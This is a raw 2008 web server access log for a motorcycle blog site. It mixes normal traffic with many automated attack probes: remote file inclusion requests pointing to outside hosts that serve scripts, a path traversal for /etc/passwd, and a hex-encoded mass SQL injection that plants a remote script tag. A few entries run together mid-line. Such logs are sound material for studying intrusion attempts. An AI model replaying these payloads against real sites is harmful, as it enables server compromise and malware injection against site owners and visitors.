70.84.182.98 - - [28/Aug/2008:09:40:39 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [28/Aug/2008:09:40:42 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [28/Aug/2008:09:40:42 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:40:58 -0700] "GET /logs/access_080124.log///components/com_sef/sef.php?mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:09:41:00 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.stjudechattanooga.org/css/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:09:41:00 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.stjudechattanooga.org/css/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:09:41:01 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.stjudechattanooga.org/css/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.188 - - [28/Aug/2008:09:41:37 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.22.188 - - [28/Aug/2008:09:41:39 -0700] "GET /blog/index.php/2008/06/page/2/ HTTP/1.0" 404 8211 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:41:46 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:41:46 -0700] "GET //modules/xfsection/modify.php?dir_module=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:41:46 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:41:55 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-045.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:42:27 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-114_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:42:28 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-072.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
204.15.10.22 - - [28/Aug/2008:09:42:42 -0700] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.menaspalace.com/k4m1/rid??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
204.15.10.22 - - [28/Aug/2008:09:42:42 -0700] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.menaspalace.com/k4m1/rid??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:42:43 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-141.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:43:02 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-025_2.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
65.55.109.243 - - [28/Aug/2008:09:43:28 -0700] "GET /blog/index.php/2008/04/ HTTP/1.0" 200 13468 "http://search.live.com/results.aspx?q=motorcycles" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.243 - - [28/Aug/2008:09:43:28 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/2008/04/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.243 - - [28/Aug/2008:09:43:28 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/2008/04/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.243 - - [28/Aug/2008:09:43:29 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/2008/04/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.243 - - [28/Aug/2008:09:43:29 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.0" 200 29867 "http://dmulk.com/blog/2008/04/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.243 - - [28/Aug/2008:09:43:29 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.0" 200 8888 "http://dmulk.com/blog/2008/04/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.243 - - [28/Aug/2008:09:43:30 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.0" 200 6722 "http://dmulk.com/blog/2008/04/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:43:30 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-011_4.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
72.232.48.106 - - [28/Aug/2008:09:43:34 -0700] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.menaspalace.com/k4m1/rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
72.232.48.106 - - [28/Aug/2008:09:43:34 -0700] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.menaspalace.com/k4m1/rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
193.178.228.12 - - [28/Aug/2008:09:43:50 -0700] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.menaspalace.com/k4m1/rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
193.178.228.12 - - [28/Aug/2008:09:43:50 -0700] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.menaspalace.com/k4m1/rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
216.180.241.37 - - [28/Aug/2008:09:43:54 -0700] "GET /logs/access_080229.log/modules/xfsection/modify.php?dir_module=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [28/Aug/2008:09:43:54 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:43:58 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-024.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
216.180.241.37 - - [28/Aug/2008:09:44:17 -0700] "GET /logs/access_080112.log/modules/xfsection/modify.php?dir_module=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:44:28 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0126.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
65.182.187.86 - - [28/Aug/2008:09:44:28 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:44:46 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0159.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
195.218.170.130 - - [28/Aug/2008:09:44:53 -0700] "GET /index2.php?page=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.44.72.170 - - [28/Aug/2008:09:45:01 -0700] "GET /logs/access_080728.log////?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [28/Aug/2008:09:45:03 -0700] "GET ////?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 200 85475 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [28/Aug/2008:09:45:04 -0700] "GET /logs////?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 200 62578 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [28/Aug/2008:09:45:10 -0700] "GET /logs/access_080217.log////?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:45:10 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-075_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
205.234.213.247 - - [28/Aug/2008:09:45:18 -0700] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.213.247 - - [28/Aug/2008:09:45:19 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.213.247 - - [28/Aug/2008:09:45:19 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.213.247 - - [28/Aug/2008:09:45:24 -0700] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.213.247 - - [28/Aug/2008:09:45:24 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.213.247 - - [28/Aug/2008:09:45:24 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:45:42 -0700] "GET /logs/access_080808.log/bemarket/postscript/postscript.php?p_mode=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:45:42 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.187.101.26 - - [28/Aug/2008:09:45:47 -0700] "GET /logs/access_080820.log/includes/stats.inc.php?prefix=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.187.101.26 - - [28/Aug/2008:09:45:47 -0700] "GET /logs/includes/stats.inc.php?prefix=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.187.101.26 - - [28/Aug/2008:09:45:47 -0700] "GET /includes/stats.inc.php?prefix=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:45:55 -0700] "GET /logs/access_080808.log/bemarket/postscript/postscript.php?p_mode=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:45:55 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:45:55 -0700] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.93.12.51 - - [28/Aug/2008:09:46:13 -0700] "GET /logs/access_071214.log HTTP/1.0" 200 157483 "http://www.google.co.uk/search?q=max+6541+review&hl=en&lr=&client=firefox-a&rls=org.mozilla:en-GB:official_s&start=10&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; (R1 1.5))" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:46:34 -0700] "GET /logs/access_080701.log/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:46:34 -0700] "GET /plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:09:46:34 -0700] "GET /?show=gallery&pageid=169 HTTP/1.0" 200 149658 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:46:36 -0700] "GET /logs/access_080701.log/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:46:36 -0700] "GET /plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:46:37 -0700] "GET /logs/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:46:38 -0700] "GET /logs/access_080312.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:46:38 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:46:42 -0700] "GET /logs/access_080418.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:46:47 -0700] "GET /logs/access_080718.log/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.128.80.13 - - [28/Aug/2008:09:46:48 -0700] "GET /logs/access_080701.log/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.mta.cl/guestbook.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.13 - - [28/Aug/2008:09:46:48 -0700] "GET /plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.mta.cl/guestbook.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.13 - - [28/Aug/2008:09:46:48 -0700] "GET /logs/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.mta.cl/guestbook.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:09:46:49 -0700] "GET /logs/access_080211.log/test.php?page=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:09:46:49 -0700] "GET /test.php?page=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:09:46:50 -0700] "GET /logs/test.php?page=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:09:46:50 -0700] "GET /logs/access_080228.log/test.php?page=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:46:51 -0700] "GET /logs/access_080418.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:46:51 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:46:52 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.128.80.13 - - [28/Aug/2008:09:46:52 -0700] "GET /logs/access_080718.log/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.mta.cl/guestbook.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:46:56 -0700] "GET /logs/access_080718.log/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:47:05 -0700] "GET /logs/access_080228.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.128.80.13 - - [28/Aug/2008:09:47:14 -0700] "GET /logs/access_080312.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/guestbook.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.13 - - [28/Aug/2008:09:47:14 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/guestbook.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.13 - - [28/Aug/2008:09:47:14 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/guestbook.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.133.215.166 - - [28/Aug/2008:09:47:15 -0700] "GET /logs/access_080530.log///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [28/Aug/2008:09:47:15 -0700] "GET /logs/access_080529.log///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.128.80.13 - - [28/Aug/2008:09:47:16 -0700] "GET /logs/access_080418.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/guestbook.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.22.188 - - [28/Aug/2008:09:47:17 -0700] "GET /blog/index.php/category/motorcycles/ HTTP/1.0" 200 83321 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:47:25 -0700] "GET /plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.47.142.215 - - [28/Aug/2008:09:47:33 -0700] "GET /logs/access_080213.log?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272ladiescs/us2:98.148.241.69.47.142.215 - - [28/Aug/2008:09:47:36 -0700] "GET /logs/access_080213.log?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D2077686572652027rossion/us1:119.72.55.2469.47.142.215 - - [28/Aug/2008:09:47:41 -0700] "GET /logs/access_080114.log?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D2077686572652027lingeriestoreusa/us2:64.69.47.142.215 - - [28/Aug/2008:09:47:41 -0700] "GET /logs/access_080114.log?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272readfairytales/us1:75.9274.55.109.34 - - [28/Aug/2008:09:48:10 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:48:15 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-037_2.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:48:17 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-016_2.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:48:29 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0052.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:49:01 -0700] "GET /logs/access_080803.log/bemarket/postscript/postscript.php?p_mode=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:49:20 -0700] "GET /logs/access_080103.log/index2.php?x=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:49:24 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:49:28 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0146.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:49:37 -0700] "GET /logs/access_080103.log/index2.php?x=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
